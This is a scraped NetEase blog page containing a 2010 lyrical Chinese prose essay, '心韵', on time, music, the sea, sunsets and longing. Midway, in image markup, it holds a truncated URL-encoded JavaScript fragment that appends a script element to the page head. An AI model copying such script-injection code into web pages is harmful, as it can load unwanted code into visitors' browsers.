注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

永远有多远?

我一直走,一直走,永远走不到头

 
 
 

日志

 
 
 
 

心韵  

2010-11-28 12:33:04|  分类: 散文 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
        吉他声在空中蔓延,干净却又清新的嗓音,舒服里夹杂着一点不安、迷离,又冷又温柔却又不失潇洒。荧光屏前的我伴着这徐徐跳动的音符,打开我久违的心扉,让快意冲破层层生活中那些琐烦,把一份飞扬的喜悦留在正午的时光里,伴着悠扬的旋律荡涤尘世中的芜杂,把一份跳跃的激情尽情的释放、伴着我长长漂泊的脚步……远处碧海蓝天,曾经有我留迹的足印,我那不朽的情怀忙碌的冲撞在那碧波绿色中,扰乱了海天相接的宁静,荡漾的波浪层层而来,掀起层层惊涛。把和谐的宁静留在岁月的惊涛声中!把心头那份追寻的梦想随着海潮的退却,淹没在漫无边际的碧蓝下。         

图片

我躲在岁月碧蓝下,静听岁月波涛声狂吼,潮湿的凋零落满一地。那被惊浪拍打碎诺言,暗然沉默。欲乘风破浪,惊涛骇浪中,我落下了深情的泪水。岁月!你时而卷着狂狂叠浪欲拍打我着我弱小的灵魂,无声息的把我吐灭。我在浪涛声中与“你”同行,“你”时而放弃对我的携手,丢下迷茫的我,迷茫的让我站在惊骇之下聆听你肆意的狂歌。但我记得的“你”的歌声只是在等待着我优美的舞姿伴奏,等待着我灵魂呐喊,与“你”共谱一曲岁月之歌。宁静的深空下,岁月的歌声一直飘荡在心头,或是悲伤,或是喜悦。跳动音符或是闪动着美妙姿态,或是掀起宁静,掀翻了生命种那片碧绿的静海,把我弱小的灵魂一同掀起。我坚定的踏过狂叠浪花,站在遥远海岸,看点点红霞落下的绚烂,倾听海水与晚霞交拍声音。看岁月闪烁着满天快乐的音符,倾听岁月那首永远唱不完的歌……        

图片

    流年的岁月,我在追寻什么呢?是那碧海蓝天之下的晚霞,还是那岁月沿途叠叠的繁华!如今天这一切都沉淀在岁月的波涛声中。伴着思绪,我还有那快乐的音符,它闪烁着我内心的激情,闪烁生命的向往……我知道!我的心还没沉淀。悠扬的旋律总会打开我思绪的光茫,跳动的音符总会掀起我心头的波涛,把我生命的激情引向在那蓝天碧海之间,伴着晚霞,点亮岁月叠叠的繁华。岁月如歌,用心聆听,处处都是心潮澎湃。岁月有情,让我们弹奏起激情的音符,把生命那缕绚烂洒在岁月深处,伴着我们在岁月深深的足迹,迹留一片深情……

              图片

    他乡,在一种繁华的风花雪月中沉淀了思维,也寥落了一颗落寂的心。 于夜的安静,倦了的心,在孤寂的心空蔓延荡来。静坐荧屏前,打开,一首歌打破了心头的寂静,或是岁月的歌声,唱出不老的传说,又或是内心浅浅的低吟,那逝去的光华。遥望皓月当空,依然是传说中那样的光鲜。落寂并不代表沉默,唯有我心,今夜你能懂。经年,过往长长的印痕,在回首之间,依然是那样明晰。月色映衫着,思绪飞扬在一排排汩汩的文字中跳动。如果将落寂写成文字,体验一种寂寥的夜空,那将抚慰的是一颗寂寥的心。         

图片

    我明白不死的心,永远是在过往的繁华当中,荡起了一连串激动的思维。那种突入其来的感觉,悄然惊醒我沉没了梦想。也许付出并不代表我的遗憾,人生当中,付出的,收获并不能达到我们预期中的收获。长长的追素着,在叹息声中,写意曾经失落的心,理顺生命当中的潮起潮落,不得不感叹曾经失去多少。也许是年少的无知,也许这就是年轻的悲哀。最终还是残留在我们心头那段不堪青涩印记,在生命历程中,一不小心触碰,就如严冬中那一树的冰块,落的一地破碎。我明白冰块寥落尘土,终会在温暖春天来临把它温柔融化,但我却不明白这其中需要多少的期盼。而我就是尘土中那一颗小小的尘埃,冷眼旁观,已在迷离中呼吸那被春暖融化的冰冻气息,沁入心扉,却是一般难言的冰寒。          

心韵 - 贝叶树 - 永远有多远?cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A" <心韵 - 贝叶树 - 永远有多远?图片

    历经过春花秋月的温馨,却忠于严寒的印记。写意夏雨狂傲与泰然,却永远无法触摸那道泰然雨景。这莫不是深思者最大的悲哀。夜,恣意蔓延着它的魅惑,黑色羽翼缀满盈盈珠光,散发炫目的奢靡。沉沉的黑暗影射出罂粟般妖艳的触角,空气中飘浮着暧昧的气息。疯狂的思绪穿透寂落的心,诱惑着令人颓废的迷离。心痛吞噬凌乱的思绪无限延伸,忧伤恍若幽灵般攀附着寂寞如影随行。年轮的彼岸,溢满了烦怨的忧郁。那春花秋月的温馨,仿若如寒冬的冰块,晶莹剔透,却又寒气逼人。沉淀在流年的却是一股难解的冰寒,悠悠我思,夜诉悲凉,春暖花开袭寒心。

图片

    叹息在迷离中沉失多少光华,叹息被诱惑的心是否颓废走进落寂边缘……月色染亮的夜空,只为窗前一袭孤寂的影子吗?而我心在此刻聚集了少月下的光亮,又聚集多了年华的叹息。不明如此的夜竟会有这样的叹息,不明白思素的过往会如此的苍白无力。用力尽的思绪想象一些美好的字符,写照春暖夜色的暖意,却几尽空洞的心,依然一片虚空。也许是用一些颓废的文字来描述一颗迷茫的心,也许流年的过往就在这样轻唱浅吟当中而过,不经意黄花落尽,回首已是白发斑驳。         

图片

    把心攀附着那还未落的光点。点燃一丝希望,捕获那黄昏未落光茫。我亦信,心不死,泪不干,沉沉跫音,敲开希望之门。历经千山万水,站在记忆的门坎上,那一丝晚霞会抚慰我额前几纹皱皱印痕吗!人海中,我失却了一种眼神,锁不住时光飞度的白练。 小窗独倚听雨眠,看夜静人阑,抛洒流光沉醉于春暖黄昏晚霞。聆听晚霞落红点点,可又叹息它稍纵即逝。望断天涯,徐徐落下黑的朦胧。但我却深信,明天后天,我依然会在黄昏深处沐浴它应有的美丽。夕阳,晚霞生辉,那一刹美,有它轮回的道理,黑夜吞蚀它表象光华,它的灵魂依然存于每个日日夜夜深处。

图片

    纠缠,挣扎中,依然把它应有的艳丽绽放在岁月无数过春夏秋冬怀抱里,点缀自然那道美丽风景。断人初静。谁见幽人独往来?缥缈孤鸿影。心海荡漾,总会在一片黄昏深处,静听沉沉跫音。一路艰辛归何处,残留在额前是几纹皱皱的印痕,晚霞映衫,勾惑起一丝苍茫,几声叹息。岁月中一份不可多得的牵绊,是前尘往事找寻,看遍轮回,划归一叶小舟沧海行,弹指一瞬,往返在沉淀的梦中,浅吟经年如梦逝。我心不老,亦信希望缠绕,托影寻梦,千百轮回深处。几经曲折,风伴、浪吼、雨同行。跫音深处定格了年华某些意义。无悔风雨随行,无悔浪打浪尖,我心依旧,寻梦千年不变。         

图片

    千千万万的迂回曲折里,坐观宇内,仰望无边黄昏,等待清风明月入怀,对世间美好的向往层层密密。繁华深处,人潮涌动,车水马龙川流不息,自有它的意趣,问遍苍穹,只求一份不灭希望之光。于黄昏那道刹那的鲜红晚霞,是我有着对生命深深的感触,在命运的徘徊里,有过黄花落尽,有过春花秋月,这一切刻划在岁月的年轮里,如黄昏那道夕阳,闪烁刹那光茫,却又叹息它徐徐落下的暗然。

图片

    心海茫然,聆听黑夜黎明,宁静聚思,只为等待不变梦想,只为理顺生命的真意。我心忧伤意为何,是岁月沉淀那道希望之光,还是我没捕捉黄昏那道稍纵即逝的美?千年不变的梦只是传说吗?但我深信黄昏深处那道晚霞,会再次迎着再生太阳,绽放它唯美的红艳。人生苦短,陌上清晨,西去黄昏。踏尽红尘何处寻。梦里轮回纵有千年,黄昏纵然轮回在它永恒鲜红的生命里。可生命只是传说中的轮回。捕获刹那光华,点燃希望之光芒,是我不死的心,在命运的徘徊里长长的追求。

  评论这张
 
阅读(65)| 评论(5)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017